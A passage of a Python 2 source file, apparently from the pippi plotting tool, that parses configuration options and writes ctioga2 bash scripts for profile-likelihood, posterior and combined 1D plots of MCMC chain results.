postMeanOnPost = dataObject('plot_posterior_mean_on_posterior_pdf',boolean)
postMeanOnProf = dataObject('plot_posterior_mean_on_profile_like',boolean)
bestFitOnPost = dataObject('plot_best_fit_on_posterior_pdf',boolean)
bestFitOnProf = dataObject('plot_best_fit_on_profile_like',boolean)
doLegend1D = dataObject('legend_on_1D',int_list)
doLegend2D = dataObject('legend_on_2D',intuple_list)
legendLoc1D = dataObject('legend_locations_1D',string_dictionary)
legendLoc2D = dataObject('legend_locations_2D',int_pair_string_dictionary)
doKey1D = dataObject('key_on_1D',int_list)
doKey2D = dataObject('key_on_2D',intuple_list)
keyLoc1D = dataObject('key_locations_1D',string_dictionary)
keyLoc2D = dataObject('key_locations_2D',int_pair_string_dictionary)
doColourbar = dataObject('plot_colourbar_2D',intuple_list)
doHistograms = dataObject('plot_as_histograms_1D',boolean)
legendLines = dataObject('extra_legend_lines',string_list)
plotSize = dataObject('plot_size',string)
blame = dataObject('blame',string)
logoFile = dataObject('logo_file',string)
logoLoc = dataObject('logo_loc',floatuple_list)
logoWidth = dataObject('logo_width',floater)
colours = dataObject('colour_scheme',internal)
axisRanges = dataObject('axis_ranges',floatuple_dictionary)
yAxisAngle = dataObject('yaxis_number_angle',floater)
refPoint = dataObject('reference_point',float_dictionary)
refKey = dataObject('reference_text',string)
keys = keys+[scriptdir,doComparison,postMeanOnPost,postMeanOnProf,bestFitOnPost,
bestFitOnProf,doColourbar,doLegend1D,doLegend2D,legendLoc1D,legendLoc2D,
doHistograms,legendLines,blame,colours,axisRanges,yAxisAngle,refPoint,
refKey,doKey1D,doKey2D,keyLoc1D,keyLoc2D,parsedir,logoFile,logoLoc,logoWidth]
# Define pip file entries to be read from savedkeys file
labels = dataObject('quantity_labels',string_dictionary)
dataRanges = dataObject('data_ranges',floatuple_dictionary)
lookupKeys = dataObject('lookup_keys',int_dictionary)
# Constants
blameFractionalVerticalOffset = 1.2e-2
PosteriorIsMainInComboPlot = True
likeColourbarString = 'Profile likelihood ratio $\Lambda=\mathcal{L}/\mathcal{L}_\mathrm{max}$'
postColourbarString = 'Relative probability $P/P_\mathrm{max}$'
defaultLegendLocation = 'bl'
defaultKeyLocation = 'tr'
defaultRefKey = 'Ref.\ point'
keyYSep = 0.055
keyXSep = 0.04
keyYVals = {'t':[0.94 - x*keyYSep for x in range(3)], 'c':[0.44 + x*keyYSep for x in range(3)], 'b':[0.065 + x*keyYSep for x in range(3)]}
keyXVals = {'r':[0.74 + x*keyXSep for x in range(2)], 'c':[0.45 + x*keyXSep for x in range(2)], 'l':[0.06 + x*keyXSep for x in range(2)]}
def script(filename):
# input: filename = the name of the pip file
print
# Parse pip file
getIniData(filename,keys)
# Make sure that comparison is turned off if comparison filename is missing
if doComparison.value and secChain.value is None:
print ' Warning: comparison curves requested but no comparison file specified.\n Skipping comparison...\n'
doComparison.value = False
# Work out where the parse output is located
if parsedir.value is None:
# No parse_dir; default to searching the directory containing chain(s)
parseFiledir = re.sub(r'/.*?$', '/', mainChain.value)
else:
# Search in parse_dir
parseFiledir = parsedir.value+'/'
# Work out where the script output is to be located
if scriptdir.value is None:
# No script_dir; default to parse directory
baseFiledir = parseFiledir
else:
# Save in script_dir
baseFiledir = scriptdir.value+'/'
# Make sure script_dir exists, make it if not
safe_dir(scriptdir.value)
# Work out how to reference the parse dir from the script dir
if parseFiledir[0] == '/' or parseFiledir[0] == '~':
# The parse output path is absolute; easy-peasy
parseFiledirFromScriptFiledir = parseFiledir
else:
# The parse output path is a relative one
if baseFiledir[0] == '/' or baseFiledir[0] == '~':
# The script output is to be placed in an absolute path; need to convert the parse path to absolute too
parseFiledirFromScriptFiledir = os.getcwd() + '/' + parseFiledir
else:
# The script output is also to be placed in a relative path
parseFiledirFromScriptFiledir = re.sub(r'.+?/', '../', baseFiledir+'/') + parseFiledir
# Locate and scale logo (if any)
if logoFile.value is not None:
if logoFile.value == 'pippi': logoFile.value = sys.path[0]+'/pippi'
# Work out how to reference the logo file from the script dir
if logoFile.value[0] != '/':
if baseFiledir[0] == '/':
# The script output is to be placed in an absolute path; need to convert the logo path to absolute too
logoFile.value = os.getcwd() + '/' + logoFile.value
else:
# The script output is also to be placed in a relative path
logoFile.value = re.sub(r'.+?/', '../', baseFiledir+'/') + logoFile.value
# Strip extensions off chain filenames
baseFilename = baseFiledir + re.sub(r'.*/|\..?.?.?$', '', mainChain.value)
parseFilename = parseFiledir + re.sub(r'.*/|\..?.?.?$', '', mainChain.value)
parseFilenameFromScriptFiledir = parseFiledirFromScriptFiledir + re.sub(r'.*/|\..?.?.?$', '', mainChain.value)
if doComparison.value:
secParseFilename = parseFiledir + re.sub(r'.*/|\..?.?.?$', '', secChain.value) + '_comparison'
secParseFilenameFromScriptFiledir = parseFiledirFromScriptFiledir + re.sub(r'.*/|\..?.?.?$', '', secChain.value) + '_comparison'
# Retrieve labels and data ranges saved in earlier parsing run
getIniData([parseFilename+'_savedkeys.pip'],[labels,dataRanges,lookupKeys])
#Work out whether to do posteriors and check that flags match up
if doPosterior.value and not any(x in labels.value for x in permittedMults):
print ' Warning: do_posterior_pdf = T but no multiplicity in chain labels.\n Skipping posterior PDF...'
doPosterior.value = False
# set colour scheme if it is undefined
if colours.value is None: colours.value = basic
# Create 1D plotting scripts
if oneDplots.value is not None:
# Determine whether histograms are required or not
histString = '' if doHistograms.value is None or not doHistograms.value else 'hist'
# Loop over requested plots
for plot in oneDplots.value:
print ' Writing scripts for 1D plots of quantity ',plot
# Set up filenames
currentBase = baseFilename+'_'+str(plot)
currentParse = parseFilenameFromScriptFiledir+'_'+str(plot)
currentBaseMinimal = re.sub(r'.*/', '', currentBase)
if doComparison.value: currentSecParse = secParseFilenameFromScriptFiledir+'_'+str(plot)
# Get plot limits
xtrema = dictFallback(axisRanges,dataRanges,plot)
xRange = xtrema[1] - xtrema[0]
ytrema = [0.0,1.0]
yRange = 1.0
# Locate and scale logo (if any)
if logoFile.value is not None:
logoCoords = [xtrema[0]+logoLoc.value[0][0]*xRange,logoLoc.value[0][1]]
logoString = '\'\\includegraphics[width = '+str(logoWidth.value*8.8)+'cm]{'+logoFile.value+'}\''
# Determine reference point
if refPoint.value is not None and plot in refPoint.value:
plotRef = True
refString = ' --draw-marker '+str(refPoint.value[plot])+','+str(yRange*colours.value.referenceMarkerInnerScale/40.0)+' '+\
colours.value.referenceMarkerInner+' /color \''+colours.value.referenceMarkerInnerColour+\
'\' /scale '+str(colours.value.referenceMarkerInnerScale)+' \\\n'+\
' --draw-marker '+str(refPoint.value[plot])+','+str(yRange*colours.value.referenceMarkerOuterScale/40.0)+' '+\
colours.value.referenceMarkerOuter+' /color \''+colours.value.referenceMarkerOuterColour+\
'\' /scale '+str(colours.value.referenceMarkerOuterScale)+' \\\n'
else:
plotRef = False
# Determine plot size
if plotSize.value is None or plotSize.value is '':
plotSizeInternal = '11cm x 4in'
else:
plotSizeInternal = plotSize.value
# Make profile likelihood plotting scripts
if doProfile.value:
# Get contours
if contours1D.value is not None:
contourLevels = getContours(parseFilename,plot,'like')
# Determine keys
keyString = ''
if doKey1D.value is not None and plot in doKey1D.value:
# Get gross key location
try:
keyLoc = keyLoc1D.value[plot]
except (KeyError, TypeError):
keyLoc = defaultKeyLocation
# Get text to be used for reference point
refText = defaultRefKey if refKey.value is None else refKey.value
# Get x and y coordinates for 3 possible keys (for markers and text)
yVals = ytrema[0] + np.array(keyYVals[keyLoc[0]])*yRange
xVals = xtrema[0] + np.array(keyXVals[keyLoc[1]])*xRange
markers = []
# Get details of key for reference point
if plotRef: markers.append([colours.value.referenceMarkerOuter, colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterScale, refText, colours.value.referenceMarkerInner,
colours.value.referenceMarkerInnerColour, colours.value.referenceMarkerInnerScale/
colours.value.referenceMarkerOuterScale])
# Get details of key for posterior mean
if postMeanOnProf.value: markers.append([colours.value.mainPostMeanMarker, colours.value.mainPostMeanColour1D,
colours.value.mainPostMeanMarkerScale, 'Mean'])
# Get details of key for best fit
if bestFitOnProf.value: markers.append([colours.value.mainBestFitMarker, colours.value.mainBestFitColour1D,
colours.value.mainBestFitMarkerScale, 'Best fit'])
# Reverse vertical ordering if keys are to be placed at the top of the page, so as to fill from the top down
if keyLoc[0] == 't': markers.reverse()
# Construct ctioga2 command for each key
for i,key in enumerate(markers):
if key[0] == 'Bullet' or key[0] == 'BulletOpen': key[2] /= 1.5
if key[2] > 1.0: key[2] = 1.0
# Write the extra marker overlay for the reference point
if len(key) == 7: keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[4]+' /color \''+\
key[5]+'\' /scale '+str(key[6]*key[2])+'\\\n'
# Write the main marker
keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[0]+' /color \''+key[1]+'\' /scale '+str(key[2])+'\\\n'
# Write the key text
keyString += ' --draw-text '+str(xVals[1])+','+str(yVals[i])+' \''+key[3]+'\' /color \''+colours.value.keyTextColour1D
keyString += '\' /justification left /scale 0.75 /alignment center \\\n'
# Open plotting shell script file for writing
outfile = smart_open(currentBase+'_like1D.bsh','w')
outfile.write('#!/usr/bin/env bash\n')
outfile.write('# This plot script created by pippi '+pippiVersion+' on '+datetime.datetime.now().strftime('%c')+'\n')
outfile.write('ctioga2\\\n')
outfile.write(' --name '+currentBaseMinimal+'_like1D')
outfile.write(' --plot-scale \''+str(plot_scale)+'\'\\\n')
outfile.write(' --page-size \''+plotSizeInternal+'\'\\\n')
outfile.write(' --frame-margins '+str(left_margin)+','
+str(right_margin)+','
+str(top_margin)+','
+str(bottom_margin)+'\\\n')
outfile.write(' --xrange '+str(xtrema[0])+':'+str(xtrema[1])+'\\\n')
outfile.write(' --yrange 0:1\\\n')
outfile.write(' --ylabel \'Profile likelihood ratio $\Lambda=\mathcal{L}/\mathcal{L}_\mathrm{max}$\' /shift 2.1\\\n')
outfile.write(' --xlabel \''+labels.value[plot]+'\'\\\n')
outfile.write(' --label-style x /scale 1.0 /shift 0.15 --label-style y /scale 1.0 /shift 0.15')
if yAxisAngle.value is not None: outfile.write(' /angle '+str(yAxisAngle.value))
outfile.write('\\\n')
if contours1D is not None:
for i, contour in enumerate(contourLevels):
outfile.write(' --draw-line '+str(xtrema[0])+','+contour+' '+str(xtrema[1])+','+contour+' /color \'Black\' '+
'/style Dashes /width '+str(float(colours.value.lineWidth1D)*0.5)+'\\\n')
outfile.write(' --draw-text '+str(xtrema[0]+0.045*(xtrema[1]-xtrema[0]))+','+str(float(contour)+0.005)+' \''+str(contours1D.value[i])+
'\%CL\' /color \'Black\' /scale 0.5 /justification left /alignment bottom\\\n')
if doComparison.value:
# Do everything for comparison chain
outfile.write(' --plot '+currentSecParse+'_like1D'+histString+'.ct2@1:2 /fill xaxis /fill-transparency '+colours.value.fillTransparency1D+
' /fill-color '+colours.value.comparisonProfColour1D+' /color '+colours.value.comparisonProfColour1D+
' /line-style '+colours.value.comparison1DLineStyle+' /line-width '+colours.value.lineWidth1D+'\\\n')
if bestFitOnProf.value and colours.value.comparisonBestFitMarker is not None:
# Get best-fit point and plot it
bestFit = getCentralVal(secParseFilename,plot,'like',lookupKeys)
outfile.write(' --draw-marker '+str(bestFit)+','+str(yRange*colours.value.comparisonBestFitMarkerScale/40.0)+' '+
colours.value.comparisonBestFitMarker+' /color \''+colours.value.comparisonBestFitColour+
'\' /scale '+str(colours.value.comparisonBestFitMarkerScale)+' \\\n')
if postMeanOnProf.value and colours.value.comparisonPostMeanMarker is not None:
# Get posterior mean and plot it
postMean = getCentralVal(secParseFilename,plot,'post',lookupKeys)
if not postMean: sys.exit('Error: plot_posterior_mean_on_profile_like = T but no multiplicity given!')
outfile.write(' --draw-marker '+str(postMean)+','+str(yRange*colours.value.comparisonPostMeanMarkerScale/40.0)+' '+
colours.value.comparisonPostMeanMarker+' /color \''+colours.value.comparisonPostMeanColour+
'\' /scale '+str(colours.value.comparisonPostMeanMarkerScale)+' \\\n')
outfile.write(' --plot '+currentParse+'_like1D'+histString+'.ct2@1:2 /fill xaxis /fill-transparency '+colours.value.fillTransparency1D+
' /fill-color '+colours.value.mainProfColour1D+' /color '+colours.value.mainProfColour1D+
' /line-style '+colours.value.main1DLineStyle+' /line-width '+colours.value.lineWidth1D+'\\\n')
if doLegend1D.value is not None and plot in doLegend1D.value:
# Write legend
try:
legendLocation = legendLoc1D.value[plot]
except (KeyError, TypeError):
legendLocation = defaultLegendLocation
outfile.write(' --legend-inside \''+legendLocation+'\' /scale 1.0 /vpadding 0.1\\\n')
if legendLines.value is not None:
for x in legendLines.value: outfile.write(' --legend-line \''+x+'\' /color \''+colours.value.legendTextColour1D+'\'\\\n')
outfile.write(' --legend-line \'Prof.~likelihood\' /color \''+colours.value.legendTextColour1D+'\'\\\n')
if bestFitOnProf.value:
# Get best-fit point and plot it
bestFit = getCentralVal(parseFilename,plot,'like',lookupKeys)
outfile.write(' --draw-marker '+str(bestFit)+','+str(yRange*colours.value.mainBestFitMarkerScale/40.0)+' '+
colours.value.mainBestFitMarker+' /color \''+colours.value.mainBestFitColour1D+
'\' /scale '+str(colours.value.mainBestFitMarkerScale)+' \\\n')
if postMeanOnProf.value:
# Get posterior mean and plot it
postMean = getCentralVal(parseFilename,plot,'post',lookupKeys)
if not postMean: sys.exit('Error: plot_posterior_mean_on_profile_like = T but no multiplicity given!')
outfile.write(' --draw-marker '+str(postMean)+','+str(yRange*colours.value.mainPostMeanMarkerScale/40.0)+' '+
colours.value.mainPostMeanMarker+' /color \''+colours.value.mainPostMeanColour1D+
'\' /scale '+str(colours.value.mainPostMeanMarkerScale)+' \\\n')
# Plot reference point
if plotRef: outfile.write(refString)
# Draw key
outfile.write(keyString)
# Write credits
if blame.value is not None:
blameYCoordinate = str(blameFractionalVerticalOffset * yRange + ytrema[1])
outfile.write(' --draw-text '+str(xtrema[1])+','+blameYCoordinate+' \''+blame.value+'\' /scale 0.5 /justification right\\\n')
# Add logo
if logoFile.value is not None:
outfile.write(' --draw-text '+str(logoCoords[0])+','+str(logoCoords[1])+' '+logoString+'\\\n')
# Set axis colours
for x in ['top', 'bottom', 'left', 'right']:
outfile.write(' --axis-style '+x+' /stroke_color \''+colours.value.axisColour1D+'\'\\\n')
outfile.close
subprocess.call('chmod +x '+currentBase+'_like1D.bsh', shell=True)
# Make posterior pdf plotting scripts
if doPosterior.value:
# Get contours
if contours1D.value is not None:
mainContourLevels = getContours(parseFilename,plot,'post')
if doComparison.value: secContourLevels = getContours(secParseFilename,plot,'post')
# Determine keys
keyString = ''
if doKey1D.value is not None and plot in doKey1D.value:
# Get gross key location
try:
keyLoc = keyLoc1D.value[plot]
except (KeyError, TypeError):
keyLoc = defaultKeyLocation
# Get text to be used for reference point
refText = defaultRefKey if refKey.value is None else refKey.value
# Get x and y coordinates for 3 possible keys (for markers and text)
yVals = ytrema[0] + np.array(keyYVals[keyLoc[0]])*yRange
xVals = xtrema[0] + np.array(keyXVals[keyLoc[1]])*xRange
markers = []
# Get details of key for reference point
if plotRef: markers.append([colours.value.referenceMarkerOuter, colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterScale, refText, colours.value.referenceMarkerInner,
colours.value.referenceMarkerInnerColour, colours.value.referenceMarkerInnerScale/
colours.value.referenceMarkerOuterScale])
# Get details of key for posterior mean
if postMeanOnPost.value: markers.append([colours.value.mainPostMeanMarker, colours.value.mainPostMeanColour1D,
colours.value.mainPostMeanMarkerScale, 'Mean'])
# Get details of key for best fit
if bestFitOnPost.value: markers.append([colours.value.mainBestFitMarker, colours.value.mainBestFitColour1D,
colours.value.mainBestFitMarkerScale, 'Best fit'])
# Reverse vertical ordering if keys are to be placed at the top of the page, so as to fill from the top down
if keyLoc[0] == 't': markers.reverse()
# Construct ctioga2 command for each key
for i,key in enumerate(markers):
if key[0] == 'Bullet' or key[0] == 'BulletOpen': key[2] /= 1.5
if key[2] > 1.0: key[2] = 1.0
# Write the extra marker overlay for the reference point
if len(key) == 7: keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[4]+' /color \''+\
key[5]+'\' /scale '+str(key[6]*key[2])+'\\\n'
# Write the main marker
keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[0]+' /color \''+key[1]+'\' /scale '+str(key[2])+'\\\n'
# Write the key text
keyString += ' --draw-text '+str(xVals[1])+','+str(yVals[i])+' \''+key[3]+'\' /color \''+colours.value.keyTextColour1D
keyString += '\' /justification left /scale 0.75 /alignment center \\\n'
# Open plotting shell script file for writing
outfile = smart_open(currentBase+'_post1D.bsh','w')
outfile.write('#!/usr/bin/env bash\n')
outfile.write('# This plot script created by pippi '+pippiVersion+' on '+datetime.datetime.now().strftime('%c')+'\n')
outfile.write('ctioga2\\\n')
outfile.write(' --name '+currentBaseMinimal+'_post1D')
outfile.write(' --plot-scale \''+str(plot_scale)+'\'\\\n')
outfile.write(' --page-size \''+plotSizeInternal+'\'\\\n')
outfile.write(' --frame-margins '+str(left_margin)+','
+str(right_margin)+','
+str(top_margin)+','
+str(bottom_margin)+'\\\n')
outfile.write(' --xrange '+str(xtrema[0])+':'+str(xtrema[1])+'\\\n')
outfile.write(' --yrange 0:1\\\n')
outfile.write(' --ylabel \'Relative probability $P/P_\mathrm{max}$\' /shift 2.1\\\n')
outfile.write(' --xlabel \''+labels.value[plot]+'\'\\\n')
outfile.write(' --label-style x /scale 1.0 /shift 0.15 --label-style y /scale 1.0 /shift 0.15')
if yAxisAngle.value is not None: outfile.write(' /angle '+str(yAxisAngle.value))
outfile.write('\\\n')
if contours1D is not None:
for i, contour in enumerate(mainContourLevels):
outfile.write(' --draw-line '+str(xtrema[0])+','+contour+' '+str(xtrema[1])+','+contour+' /color \''+colours.value.mainPostColour1D+
'\' /style Dashes /width '+str(float(colours.value.lineWidth1D)*0.5)+'\\\n')
outfile.write(' --draw-text '+str(xtrema[0]+0.045*(xtrema[1]-xtrema[0]))+','+str(float(contour)+0.005)+' \''+str(contours1D.value[i])+
'\%CR\' /color \''+colours.value.mainPostColour1D+'\' /scale 0.5 /justification left /alignment bottom\\\n')
if doComparison.value:
# Do everything for comparison chain
if contours1D is not None:
for i, contour in enumerate(secContourLevels):
outfile.write(' --draw-line '+str(xtrema[0])+','+contour+' '+str(xtrema[1])+','+contour+' /color \''+colours.value.comparisonPostColour1D+
'\' /style Dashes /width '+str(float(colours.value.lineWidth1D)*0.5)+'\\\n')
outfile.write(' --draw-text '+str(xtrema[0]+0.045*(xtrema[1]-xtrema[0]))+','+str(float(contour)+0.005)+' \''+str(contours1D.value[i])+
'\%CR\' /color \''+colours.value.comparisonPostColour1D+'\' /scale 0.5 /justification left /alignment bottom\\\n')
outfile.write(' --plot '+currentSecParse+'_post1D'+histString+'.ct2@1:2 /fill xaxis /fill-transparency '+colours.value.fillTransparency1D+
' /fill-color '+colours.value.comparisonPostColour1D+' /color '+colours.value.comparisonPostColour1D+
' /line-style '+colours.value.comparison1DLineStyle+' /line-width '+colours.value.lineWidth1D+'\\\n')
if bestFitOnPost.value and colours.value.comparisonBestFitMarker is not None:
# Get best-fit point and plot it
bestFit = getCentralVal(secParseFilename,plot,'like',lookupKeys)
outfile.write(' --draw-marker '+str(bestFit)+','+str(yRange*colours.value.comparisonBestFitMarkerScale/40.0)+' '+
colours.value.comparisonBestFitMarker+' /color \''+colours.value.comparisonBestFitColour+
'\' /scale '+str(colours.value.comparisonBestFitMarkerScale)+' \\\n')
if postMeanOnPost.value and colours.value.comparisonPostMeanMarker is not None:
# Get posterior mean and plot it
postMean = getCentralVal(secParseFilename,plot,'post',lookupKeys)
if not postMean: sys.exit('Error: plot_posterior_mean_on_posterior_pdf = T but no multiplicity given!')
outfile.write(' --draw-marker '+str(postMean)+','+str(yRange*colours.value.comparisonPostMeanMarkerScale/40.0)+' '+
colours.value.comparisonPostMeanMarker+' /color \''+colours.value.comparisonPostMeanColour+
'\' /scale '+str(colours.value.comparisonPostMeanMarkerScale)+' \\\n')
outfile.write(' --plot '+currentParse+'_post1D'+histString+'.ct2@1:2 /fill xaxis /fill-transparency '+colours.value.fillTransparency1D+
' /fill-color '+colours.value.mainPostColour1D+' /color '+colours.value.mainPostColour1D+
' /line-style '+colours.value.main1DLineStyle+' /line-width '+colours.value.lineWidth1D+'\\\n')
if doLegend1D.value is not None and plot in doLegend1D.value:
# Write legend
try:
legendLocation = legendLoc1D.value[plot]
except (KeyError, TypeError):
legendLocation = defaultLegendLocation
outfile.write(' --legend-inside \''+legendLocation+'\' /scale 1.0 /vpadding 0.1\\\n')
if legendLines.value is not None:
for x in legendLines.value: outfile.write(' --legend-line \''+x+'\' /color \''+colours.value.legendTextColour1D+'\'\\\n')
outfile.write(' --legend-line \'Marg.~posterior\' /color \''+colours.value.legendTextColour1D+'\'\\\n')
if bestFitOnPost.value:
# Get best-fit point and plot it
bestFit = getCentralVal(parseFilename,plot,'like',lookupKeys)
outfile.write(' --draw-marker '+str(bestFit)+','+str(yRange*colours.value.mainBestFitMarkerScale/40.0)+' '+
colours.value.mainBestFitMarker+' /color \''+colours.value.mainBestFitColour1D+
'\' /scale '+str(colours.value.mainBestFitMarkerScale)+' \\\n')
if postMeanOnPost.value:
# Get posterior mean and plot it
postMean = getCentralVal(parseFilename,plot,'post',lookupKeys)
if not postMean: sys.exit('Error: plot_posterior_mean_on_posterior_pdf = T but no multiplicity given!')
outfile.write(' --draw-marker '+str(postMean)+','+str(yRange*colours.value.mainPostMeanMarkerScale/40.0)+' '+
colours.value.mainPostMeanMarker+' /color \''+colours.value.mainPostMeanColour1D+
'\' /scale '+str(colours.value.mainPostMeanMarkerScale)+' \\\n')
# Plot reference point
if plotRef: outfile.write(refString)
# Draw key
outfile.write(keyString)
# Write credits
if blame.value is not None:
blameYCoordinate = str(blameFractionalVerticalOffset * yRange + ytrema[1])
outfile.write(' --draw-text '+str(xtrema[1])+','+blameYCoordinate+' \''+blame.value+'\' /scale 0.5 /justification right\\\n')
# Add logo
if logoFile.value is not None:
outfile.write(' --draw-text '+str(logoCoords[0])+','+str(logoCoords[1])+' '+logoString+'\\\n')
# Set axis colours
for x in ['top', 'bottom', 'left', 'right']:
outfile.write(' --axis-style '+x+' /stroke_color \''+colours.value.axisColour1D+'\'\\\n')
outfile.close
subprocess.call('chmod +x '+currentBase+'_post1D.bsh', shell=True)
# Make profile-posterior comparison plotting scripts
if doProfile.value and doPosterior.value:
bestFitData = [colours.value.mainBestFitMarker, colours.value.mainBestFitColour1D, colours.value.mainBestFitMarkerScale, colours.value.mainProfColour1D]
postMeanData = [colours.value.mainPostMeanMarker, colours.value.mainPostMeanColour1D, colours.value.mainPostMeanMarkerScale, colours.value.mainPostColour1D]
# Work out which is the main and which is the comparison
if PosteriorIsMainInComboPlot:
[main, sec] = ['post', 'like']
[mainData, secData] = [postMeanData, bestFitData]
else:
[main, sec] = ['like', 'post']
[mainData, secData] = [bestFitData, postMeanData]
# Get contours
if contours1D.value is not None:
mainContourLevels = getContours(parseFilename,plot,main)
secContourLevels = getContours(parseFilename,plot,sec)
# Determine keys
keyString = ''
if doKey1D.value is not None and plot in doKey1D.value:
markers = []
# Get details of key for reference point
if plotRef: markers.append([colours.value.referenceMarkerOuter, colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterScale, refText, colours.value.referenceMarkerInner,
colours.value.referenceMarkerInnerColour, colours.value.referenceMarkerInnerScale/
colours.value.referenceMarkerOuterScale])
# Get details of key for posterior mean
markers.append([postMeanData[0], postMeanData[1], postMeanData[2], 'Mean'])
# Get details of key for best fit
markers.append([bestFitData[0], bestFitData[1], bestFitData[2], 'Best fit'])
# Reverse vertical ordering if keys are to be placed at the top of the page, so as to fill from the top down
if keyLoc[0] == 't': markers.reverse()
# Construct ctioga2 command for each key
for i,key in enumerate(markers):
if key[0] == 'Bullet' or key[0] == 'BulletOpen': key[2] /= 1.5
if key[2] > 1.0: key[2] = 1.0
# Write the extra marker overlay for the reference point
if len(key) == 7: keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[4]+' /color \''+\
key[5]+'\' /scale '+str(key[6]*key[2])+'\\\n'
# Write the main marker
keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[0]+' /color \''+key[1]+'\' /scale '+str(key[2])+'\\\n'
# Write the key text
keyString += ' --draw-text '+str(xVals[1])+','+str(yVals[i])+' \''+key[3]+'\' /color \''+colours.value.keyTextColour1D
keyString += '\' /justification left /scale 0.75 /alignment center \\\n'
# Open plotting shell script file for writing
outfile = smart_open(currentBase+'_combo1D.bsh','w')
outfile.write('#!/usr/bin/env bash\n')
outfile.write('# This plot script created by pippi '+pippiVersion+' on '+datetime.datetime.now().strftime('%c')+'\n')
outfile.write('ctioga2\\\n')
outfile.write(' --name '+currentBaseMinimal+'_combo1D')
outfile.write(' --plot-scale \''+str(plot_scale)+'\'\\\n')
outfile.write(' --page-size \''+plotSizeInternal+'\'\\\n')
outfile.write(' --frame-margins '+str(left_margin)+','
+str(right_margin)+','
+str(top_margin)+','
+str(bottom_margin)+'\\\n')
outfile.write(' --xrange '+str(xtrema[0])+':'+str(xtrema[1])+'\\\n')
outfile.write(' --yrange 0:1\\\n')
outfile.write(' --ylabel \'Relative probability $P/P_\mathrm{max}$\' /shift 2.1\\\n')
outfile.write(' --xlabel \''+labels.value[plot]+'\'\\\n')
outfile.write(' --label-style x /scale 1.0 /shift 0.15 --label-style y /scale 1.0 /shift 0.15')
if yAxisAngle.value is not None: outfile.write(' /angle '+str(yAxisAngle.value))
outfile.write('\\\n')
if contours1D is not None:
if main == 'like':
main_colour = colours.value.mainProfColour1D
main_text = 'CL'
sec_colour = colours.value.mainPostColour1D
sec_text = 'CR'
else:
main_colour = colours.value.mainPostColour1D
main_text = 'CR'
sec_colour = colours.value.mainProfColour1D
sec_text = 'CL'
for i, contour in enumerate(mainContourLevels):
outfile.write(' --draw-line '+str(xtrema[0])+','+contour+' '+str(xtrema[1])+','+contour+' /color \''+main_colour+
'\' /style Dashes /width '+str(float(colours.value.lineWidth1D)*0.5)+'\\\n')
outfile.write(' --draw-text '+str(xtrema[0]+0.045*(xtrema[1]-xtrema[0]))+','+str(float(contour)+0.005)+' \''+str(contours1D.value[i])+
'\%'+main_text+'\' /color \''+main_colour+'\' /scale 0.5 /justification left /alignment bottom\\\n')
for i, contour in enumerate(secContourLevels):
outfile.write(' --draw-line '+str(xtrema[0])+','+contour+' '+str(xtrema[1])+','+contour+' /color \''+sec_colour+
'\' /style Dashes /width '+str(float(colours.value.lineWidth1D)*0.5)+'\\\n')
outfile.write(' --draw-text '+str(xtrema[0]+0.045*(xtrema[1]-xtrema[0]))+','+str(float(contour)+0.005)+' \''+str(contours1D.value[i])+
'\%'+sec_text+'\' /color \''+sec_colour+'\' /scale 0.5 /justification left /alignment bottom\\\n')
# Plot comparison distribution
outfile.write(' --plot '+currentParse+'_'+sec+'1D'+histString+'.ct2@1:2 /fill xaxis /fill-transparency '+colours.value.fillTransparency1D+
' /fill-color '+secData[3]+' /color '+secData[3]+
' /line-style '+colours.value.comparison1DLineStyle+' /line-width '+colours.value.lineWidth1D+'\\\n')
# Plot main distribution
outfile.write(' --plot '+currentParse+'_'+main+'1D'+histString+'.ct2@1:2 /fill xaxis /fill-transparency '+colours.value.fillTransparency1D+
' /fill-color '+mainData[3]+' /color '+mainData[3]+
' /line-style '+colours.value.main1DLineStyle+' /line-width '+colours.value.lineWidth1D+'\\\n')
if doLegend1D.value is not None and plot in doLegend1D.value:
# Write legend
try:
legendLocation = legendLoc1D.value[plot]
except (KeyError, TypeError):
legendLocation = defaultLegendLocation
outfile.write(' --legend-inside \''+legendLocation+'\' /scale 1.0 /vpadding 0.1\\\n')
if legendLines.value is not None:
for x in legendLines.value: outfile.write(' --legend-line \''+x+'\' /color \''+colours.value.legendTextColour1D+'\'\\\n')
outfile.write(' --legend-line \'Like vs. Posterior\' /color \''+colours.value.legendTextColour1D+'\'\\\n')
# Get best-fit point
bestFit = getCentralVal(parseFilename,plot,'like',lookupKeys)
# Get posterior mean
postMean = getCentralVal(parseFilename,plot,'post',lookupKeys)
# Always plot both best fit and posterior mean on comparison plot
outfile.write(' --draw-marker '+str(bestFit)+','+str(yRange*bestFitData[2]/40.0)+' '+bestFitData[0]+' /color \''+bestFitData[1]+
'\' /scale '+str(bestFitData[2])+' \\\n')
if postMean: outfile.write(' --draw-marker '+str(postMean)+','+str(yRange*postMeanData[2]/40.0)+' '+postMeanData[0]+' /color \''+postMeanData[1]+
'\' /scale '+str(postMeanData[2])+' \\\n')
# Plot reference point
if plotRef: outfile.write(refString)
# Draw key
outfile.write(keyString)
# Write credits
if blame.value is not None:
blameYCoordinate = str(blameFractionalVerticalOffset * yRange + ytrema[1])
outfile.write(' --draw-text '+str(xtrema[1])+','+blameYCoordinate+' \''+blame.value+'\' /scale 0.5 /justification right\\\n')
# Add logo
if logoFile.value is not None:
outfile.write(' --draw-text '+str(logoCoords[0])+','+str(logoCoords[1])+' '+logoString+'\\\n')
# Set axis colours
for x in ['top', 'bottom', 'left', 'right']:
outfile.write(' --axis-style '+x+' /stroke_color \''+colours.value.axisColour1D+'\'\\\n')
outfile.close
subprocess.call('chmod +x '+currentBase+'_combo1D.bsh', shell=True)
# Create 2D plotting scripts
if twoDplots.value is not None:
# Loop over requested plots
for plot in twoDplots.value:
print ' Writing scripts for 2D plots of quantities ',plot
# Set up filenames
currentBase = baseFilename+'_'+'_'.join([str(x) for x in plot])
currentParse = parseFilenameFromScriptFiledir+'_'+'_'.join([str(x) for x in plot])
currentBaseMinimal = re.sub(r'.*/', '', currentBase)
